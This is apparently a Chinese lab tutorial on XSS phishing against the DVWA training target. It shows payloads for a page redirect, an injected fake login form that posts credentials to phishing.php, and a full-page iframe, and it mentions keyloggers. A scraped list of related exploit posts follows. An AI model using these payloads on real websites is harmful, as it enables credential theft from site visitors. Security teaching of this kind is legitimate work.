漏洞复现篇——利用XSS漏洞实现多种网络钓鱼方法
实验环境:
- PHPstudy
- 火狐浏览器
- DVWA靶场
模拟实验:
重定向钓鱼
把当前页面重定向到一个钓鱼页面,例如重定向到百度,代码如下:
<script>document.location.href="http://www.baidu.com"</script>
HTML 注入式钓鱼
使用 XSS 漏洞注入 HTML 或 JavaScript 代码到页面中。该段代码会在正常页面中嵌入一个 Form 表单。
<html><head><title>login</title></head><body><div style="text-align:center;"><form Method="POST" Action="phishing.php" Name="form"><br /><br />Login:<br/><input name="login" /><br />Password:<br/><input name="Password" type="password" /><br/><br/><input name="Valid" value="Ok" type="submit" /><br/></form></div></body></html>
iframe 钓鱼
这种方式是通过 标签嵌入远程域的一个页面实施钓鱼。
<iframe src="http://www.baidu.com" height="100%" width="100%"</iframe>
iframe 钓鱼
将构造好的 Flash 文件传入服务器,在目标网站用 或 标签引用即可。
高级钓鱼技术
注入代码劫持 HTML 表单、使用 JavaScript 编写键盘记录器等。
漏洞复现篇——利用XSS漏洞实现多种网络钓鱼方法相关推荐
- 漏洞复现篇——利用XSS漏洞实现键盘记录
实验环境: PHPstudy 火狐浏览器.IE DVWA靶场 实验准备: 在www目录下创建一个名为keylog.php的文件,代码如下: <?php $file = fopen("k ...
- LINUX漏洞复现篇之ShellShock漏洞
简介 ShellShock漏洞, 中文称为"破壳漏洞", 是Unix Shell中的安全漏洞 在一些网络服务器的部署中, 使用bash来处理某些请求, 允许攻击者通过低版本的bas ...
- 【漏洞复现】泛微OA E-Cology V9 browser.jsp SQL注入漏洞复现及利用(CNVD-2023-12632)
文章目录 前言 声明 一.产品介绍 二.漏洞描述 三.影响范围 四.漏洞分析 五.漏洞复现 六.SQLMAP漏洞利用 七.修复方案 前言 泛微E-Cology v9 Browser.jsp 存在SQL ...
- 利用xss漏洞结合xss平台实现社工钓鱼
本文主要介绍如何结合 xss平台 利用xss漏洞 然后,伪造一个钓鱼登陆页,然后,实现钓鱼,获取 用户和密码,之后传到我们的公网服务器中 首先我们需要一个存在xss漏洞的网站,不管是反射或存储,只要它 ...
- 【网络安全】如何使用ppmap检测和利用XSS漏洞
关于ppmap ppmap是一款基于Go开发的漏洞扫描器/漏洞利用工具,该工具能够通过在全局上下文中检查特定变量来扫描.检测和利用XSS漏洞.该工具目前只能利用已知Gadget(可能支持部分自定义开发 ...
- html %3c 不给转义,八个无法利用XSS漏洞的场景
☝☝ 相信有很多的小盆友们曾经发现过一些疑似存在XSS漏洞的站点,但又无法完全证明这个漏洞是可以被利用的.此时的你可能处于怀疑状态,也有可能你已经验证到一半了,严重怀疑其有精神病(XSS漏洞)的情况. ...
- ms08_067,ms10_046漏洞复现与利用
ms08_067,ms10_046漏洞复现与利用 一:ms08_067 主机扫描 通过nessus扫描网段内存活的主机,发现192.168.206.142该靶机并且时xp而且开启了445端口,考虑使用 ...
- 利用XSS漏洞实现键盘记录器
利用XSS漏洞实现键盘记录器 本实验以反射性的XSS漏洞为例 实验环境:dvwa靶机(ip:192.168.135.140) kali linux(ip:192.168.135.138) 1.首先开启 ...
- 怎样利用XSS漏洞在其它网站注入链接?
怎样利用XSS漏洞在其它网站注入链接? 什么是XSS攻击 怎样利用XSS漏洞在别人网站注入链接 XSS攻击注入的链接有效果吗? 对搜索结果的潜在影响有多大? 作弊和黑帽SEO 黑帽SEO是相对于白帽而 ...
最新文章
- php error_reporting 详解
- 元旦福利 | Python、机器学习、TensorFlow 图书送一波
- 什么是稀疏矩阵算法?
- 测试优惠券要怎么写测试用例?
- python考试题库 pcap_使用Python修改PCAP
- 三分钟学会缓存工具DiskLruCache
- python traceback most recent_pyspider启动错误: Traceback (most recent call last):
- 【Java】从键盘中输入一个值,在数组中查找该值的索引并输出
- brew 基本使用方法
- 广西民族博物馆真好玩
- Matlab批量读取csv、txt、prn等文件
- windows 端口被System进程占用怎么解决?
- Unity2D游戏制作常用方法
- HBase Java API操作数据库
- STM32G0系列的启动配置与程序下载说明
- 天道不一定酬勤,深度思考比勤奋更重要
- LTE小区搜索-物理小区ID和同步信号PSS、SSS
- 【第十二届蓝桥杯国赛真题】2021年第12届蓝桥杯JAVA B组国赛真题
- Liquibase集成达梦数据库、Activiti集成达梦数据库
- unity-shader-屏幕空间反射